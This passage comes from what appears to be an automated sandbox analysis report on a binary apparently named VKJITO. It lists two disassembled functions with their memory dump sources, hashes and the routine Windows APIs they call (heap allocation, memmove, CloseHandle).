                                          • Opcode Fuzzy Hash: af70b1b00ff7058282bb8f2d014b1edccdfc6f1fc0f508830665f8a47a9826b0
                                          • Instruction Fuzzy Hash: 19016D3AE14A42E9F710AB70D8062FDB374BB95314F800A71DABD026D4DF38D155C3A0
                                          Function 00007FF73A5BE640 Relevance: 5.1, APIs: 4, Instructions: 63memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Heap$AllocFreeProcessmemmove
                                          • String ID:
                                          • API String ID: 4130131589-0
                                          • Opcode ID: 0e42a8202201087e01eaf85ebe8829510cdf0d17d06ea794ff4686d98fb70351
                                          • Instruction ID: e92caf6e2185e9849a1dc5b6f8f8099e889782c0862151859d926b91c26f9ede
                                          • Opcode Fuzzy Hash: 0e42a8202201087e01eaf85ebe8829510cdf0d17d06ea794ff4686d98fb70351
                                          • Instruction Fuzzy Hash: 6311EB6AB4EB61A0FA09EF537D41179A6906F4AFD0B884875CD1D077A0DE3CD4D3A220
                                          Function 00007FF73A5AD920 Relevance: 5.0, APIs: 4, Instructions: 35COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: fce2947c762ae9bbca19df9e202608d972a39c9eec8d7f1758a77f83600d9c2e
                                          • Instruction ID: 5815fc725671cddbc80825263078f935cfd310370eeff23b7f9f3539702eda8a
                                          • Opcode Fuzzy Hash: fce2947c762ae9bbca19df9e202608d972a39c9eec8d7f1758a77f83600d9c2e
                                          • Instruction Fuzzy Hash: B511232BA08F0489F710AB65D84537C7770F786B54F404A61DE2E133E4CF38C881D210